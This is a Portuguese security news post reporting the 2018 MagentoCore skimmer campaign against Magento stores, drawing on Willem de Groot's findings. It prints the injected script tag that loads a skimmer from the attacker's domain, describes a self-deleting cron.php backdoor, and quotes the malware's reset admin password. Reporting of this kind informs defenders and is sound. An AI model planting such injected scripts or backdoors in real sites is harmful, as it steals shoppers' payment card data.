O investigador de cibersegurança Willem de Groot descobriu uma enorme campanha mal iciosa direcionada às lojas Magento. Os hackers já infectaram 7.339 lojas Magento com um script skimmer, apelidado de MagentoCore, que extrai dados de cartões de pagamento dos utilizadores que compraram nos sítios de Internet.
Os threat actores por trás desta campanha conseguiram comprometer os websites que executavam o Magento e injetaram o cartão de pagamento no seu código-fonte.
Os criminosos estão a tentar aceder ao painel de gestão da lojas Magento via ataques de brute-force.
No momento em que escrevo, consultando o serviço PublicWWW, podemos verificar que o script MagentoCore está atualmente implantado em 5.214 domínios.
O script malicioso é carregado nas páginas de checkout da loja e rouba os detalhes do cartão de pagamento fornecidos pelos utilizadores e envia-os para um servidor controlado pelo invasor.
Willem de Groot relatou que a campanha maiciosal está a usar um script skimmer carregado do domínio magentocore.net.
“A single group is responsible for planting skimmers on 7339 individual stores in the last 6 months. The MagentoCore skimmer is now the most successful to date.” de Groot wrote in a blog post.
O especialista encontrou o script MagentoCore em 7.339 lojas Magento nos últimos seis meses, a campanha ainda está em andamento e os hackers estão a comprometer as novas lojas Magento em um ritmo de 50 a 60 websites por dia.
“The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months,” de Groot says. “New brands are hijacked at a pace of 50 to 60 stores per day.” continues the expert.
Depois da intrusão os hackers adicionam um trecho JavaScript ao modelo HTML:
<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>
Este script registra as teclas digitadas pelos clientes e as envia para o servidor “magentocore.net”.
O especialista percebeu que o malware implementa um mecanismo de recuperação automatico. Basicamente é adicionado um backdoor ao cron.php que periodicamente descarrega o código malicioso, auto-executa-se, e após a execução, auto-exclui-se — uma técnica para se manter “obscuro” e discreto.
“The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit,” de Groot added.
“But the real victims are eventually the customers, who have their card and identity stolen.”
De acordo com De Groot, atualmente, 4,2% de todas as lojas Magento estão infectadas com um ou mais scripts skimmer.
https://t.co/LOlUG9WG7L skimmer planted on 7337 stores; removes competing skimmers; periodically resets admin passwords to “how1are2you3” https://t.co/vQpNYwVqx6
— Willem de Groot (@gwillem) August 30, 2018
Em Portugal …
Segundo o website PublicWWW, 22 lojas com dominío .pt estão atualmente comprometidas.
Pedro Tavares is a professional in the field of information security working as an Ethical Hacker/Pentester, Malware Researcher and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog seguranca-informatica.pt.
In recent years he has invested in the field of information security, exploring and analyzing a wide range of topics, such as pentesting (Kali Linux), malware, exploitation, hacking, IoT and security in Active Directory networks. He is also Freelance Writer (Infosec. Resources Institute and Cyber Defense Magazine) and developer of the 0xSI_f33d – a feed that compiles phishing and malware campaigns targeting Portuguese citizens.
Read more here.